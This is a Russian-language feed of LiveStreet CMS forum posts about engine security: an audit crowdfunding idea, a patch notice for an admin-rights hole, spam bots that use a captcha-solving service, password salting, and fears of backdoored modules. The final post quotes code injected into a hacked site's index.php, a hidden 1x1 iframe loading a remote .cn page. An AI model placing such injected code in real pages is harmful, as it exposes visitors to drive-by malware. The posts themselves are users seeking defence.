Совпадение?!?..



1. Предложение по проведению аудита безопасности (20.05.2011)

2. Взломан сайт (24.05.2011)

Никому ничего не хочу навязывать, просто пришла в голову идея и решил с вами ей поделится. Как вы поняли по заголовку, речь пойдет о безопасности нашего обще-любимого движка. На сколько я знаю существуют серьезные конторы занимающиеся проверкой безопасности и устранению всевозможных дырок и уязвимостей. Еще я знаю что стоит это не маленьких денег. Собственно идея в том чтобы «скинуться» всем порталом на такую проверку. Администрация может установить счетчий сбора пожертвований отдельно для этой цели на главной странице, типо как было на википедии.
P.S: Напоминаю что это всеголишь идея поэтому не нужно устраивать палемику, просто спокойно выскажите свое мнение.

11 дней назад на контактный емейл пришло письмо:

from	Почтовик LiveStreet <noreply@livestreet.ru>
to	
date	Sun, Dec 19, 2010 at 2:48 PM
subject	Оповещение безопасности
mailed-by	livestreet.ru
	
hide details Dec 19 (11 days ago)
	
Здравствуйте!

Уведомляем вас о закрытии в LiveStreet 0.4.2 уязвимости, с помощью которой потенциально можно было получить права администратора сайта.
Для исправления этой уязвимости вы можете скачать обновленный архив LiveStreet 0.4.2 - http://livestreetcms.com/download/get/
Либо внести изменения вручную:
1. Откройте файл /classes/actions/ActionProfile.class.php
2. Найдите строчку №522: protected function SubmitAddFriend($oUser,$sUserText,$oFriend=null) {
3. Сразу после нее вставьте строчку (только если её у вас еще там нет) : $sUserText=$this->Text_Parser($sUserText);
В итоге должно получиться следующее:
protected function SubmitAddFriend($oUser,$sUserText,$oFriend=null) {
$sUserText=$this->Text_Parser($sUserText);
$oFriendNew=Engine::GetEntity('User_Friend');


Мы настоятельно рекомендуем вам выполнить эти действия.
Спасибо за понимание.

С уважением, команда LiveStreet CMS 

Это письмо было действительно разослано администрацией сайта? Почему я не могу найти подтверждающей информации об этом тут на сайте?

PROBezopasnost.com — коллективный блог по теме безопасности на движке Livestreet.
Проекту всего несколько месяцев, однако он уже вызывает немалый интерес. Что не удивительно, ведь тема безопасности в интернете представлена довольно слабо и раздроблено по направлениям. У нас же, в хабро-подомном формате, люди делятся полезной информацией и новостями по теме безопасности без лишних ограничений. Среди популярных тем следует отметить автомобильную безопасность, личную безопасность, экология, а так же IT безопасность.
Будем рады видеть вас на нашем сайте.

PS Немного обновили дизайн

На моем сайте сегодня кто то решил протестировать скрипт для спама
kvnportal.ru/blog/459.html

была указана ссылка на тему некоего форума с обсуждением данного скрипта
divstyle.net/showthread.php?t=13

судя по коду и описанию скрипта, капча пробивается сервисом antigate.
пользователь скрипта может в автоматическом режиме регистрировать пользователей и осуществлять постинг записей с заданными заголовком, тегами и текстом статьи с обратными ссылками.

Что можно сделать для защиты от такого скрипта? Капчу улучшить, наверное, не решение, так как капча пробивается не скриптом, а сервисом распознования

Как изветсно LS хранит пароли в очень простом виде — md5(password), обладая некоторым количеством паранойи я решил добавить к нему соль, после ниже описанных изменений пароль будет храниться в виде: sha1(salt+md5(password))


Читать дальше

Хотел узнать у общественности некоторые подробности по следующему вопросу. Стоек ли Livestreet к проникновению злоумышленников, насколько он безопасен к инъекциям и др.

Вопрос возник в связи со следующим. Решил сравнить Livestreet и Wordpress — не по функциональности а по безопасности. Wordpress развивается уже много лет и все равно постоянно находят какие-то дыры. И Livestreet относительно молодой движок.?

Были ли случаи взлома Livestreet и все ли так уверены в его безопасности?

Работа идет, модули пишутся и раздаются — где-то за рубли, где-то бесплатно, не суть важно…

Меня интересует вопрос безопасности этих самых модулей и «хаков». Учитывая растущую популярность движка и желание людей «сделать» что-то издали похожее на сами знаете что, интернет постепенно наполняется всякого рода обществами сайтами на движке LS.

Вопрос к Администрации Проекта: каким путем расширения для LS попадают в каталог на официальном сайте?

Мне, да и многим другим, хотелось бы иметь уверенность в том, что устанавливаемые расширения не имеют скрытый функционал в виде бэкдоров, собирателей информации о пользователях, ботнетов и прочих радостей.

Кто-нибудь занимается изучением кода новых расширений?

Можно ли использовать актуальную версию livestreet не только для пробы и как обстоит дело с безопасностью всего движка?

Сегодня открываю сайт — получаю следующее: Parse error: syntax error, unexpected '?' in /....../public_html/index.php on line 78 Скачал index.php, открыл, в самом конце после

</table>
</fieldset>

наблюдаю

<? } ?<html><body><iframe src="http://diettopseek.cn/in.cgi?cocacola" width=1 height=1 style="visibility: hidden"></iframe></body></html>>

Во всем остальном index.php не изменился. Что это было? Может глюк на хостинге? Очень хочется верить именно в это. На всякий случай пишу, пусть Макс в курсе будет, мало ли что может быть.